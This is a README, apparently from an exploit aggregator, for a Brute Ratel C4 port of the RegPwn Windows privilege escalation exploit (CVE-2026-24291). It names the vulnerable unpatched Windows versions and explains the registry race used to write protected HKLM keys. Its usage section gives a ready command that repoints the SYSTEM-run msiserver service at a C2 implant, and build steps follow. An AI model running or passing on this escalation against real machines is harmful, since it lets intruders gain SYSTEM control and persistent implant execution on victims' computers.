## https://sploitus.com/exploit?id=95E69A72-EB26-5446-9471-82B449CCFB45
# RegPwn BOF for Brute Ratel C4
My Brute Ratel C4 BOF reimplementation of port of the [RegPwn](https://github.com/mdsecactivebreach/RegPwn) exploit by **Filip Dragovic** ([@Wh04m1001](https://github.com/Wh04m1001)) / **MDSec ActiveBreach**.
This is a sloppier BRc4 BOF reimplementation of the Flangvik's [CS BOF reimplementation](https://github.com/Flangvik/RegPwnBOF) of the original C# exploit. All credit still goes for the vulnerability research and exploit goes to Filip Dragovic and MDSec.
- **Flangvik's CS BOF reimplementation**: https://github.com/Flangvik/RegPwnBOF
- **Blog post**: https://www.mdsec.co.uk/2026/03/rip-regpwn/
- **Original repo**: https://github.com/mdsecactivebreach/RegPwn
- **CVE**: CVE-2026-24291
## What it does
Exploits a registry symlink race condition in the Windows Accessibility ATConfig mechanism to write arbitrary values to protected HKLM registry keys from a normal user context (Local Privilege Escalation).
Targets Windows 11 25H2/24H2, Windows 10 21H2, and Windows Server 2016/2019/2022 **prior to the March 2026 patch**.
**WARNING**: This exploit locks the workstation as part of the race condition.
## Default target
The `msiserver` (Windows Installer) service `ImagePath`. This service runs as SYSTEM and can be started by normal users.
## Usage
### Brute Ratel C4
```
badger> coffexec c:\maldev\projects\RegPwnBRc4BOF\regpwn.x64.o C:\JustAnotherPath\badger.exe SYSTEM\ControlSet001\Services\msiserver ImagePath
```
## Build
Requires `x86_64-w64-mingw32-gcc` (MinGW-w64 cross compiler).
```
make # build BOF (regpwn.x64.o)
make test # build standalone EXE (regpwn.x64.exe)
make clean
```
x64 only.